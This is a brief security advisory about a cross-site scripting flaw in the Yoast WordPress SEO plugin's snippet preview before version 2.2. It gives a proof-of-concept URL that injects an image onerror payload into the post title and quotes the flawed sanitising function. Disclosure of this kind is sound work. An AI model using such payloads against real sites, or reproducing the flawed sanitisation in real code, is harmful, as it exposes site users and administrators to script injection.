The “snippet preview” functionality of the Yoast WordPress SEO plugin was susceptible to cross-site scripting in versions before 2.2.
Vulnerable URL:
/wp-admin/post-new.php?post_title=<img src=x onerror=alert(1)>
Vulnerable Code (wordpress-seo/js/wp-seo-metabox.js):
function yst_clean(str) {
if (str == '' || str == undefined)
return '';
try {
str = jQuery('<div/>').html(str).text();
str = str.replace(/<\/?[^>]+>/gi, '');
str = str.replace(/\[(.+?)\](.+?\[\/\\1\])?/g, '');
} catch (e) {
}
return str;
}
Link: https://github.com/Yoast/wordpress-seo/blob/2.1.1/js/wp-seo-metabox.js#L1-13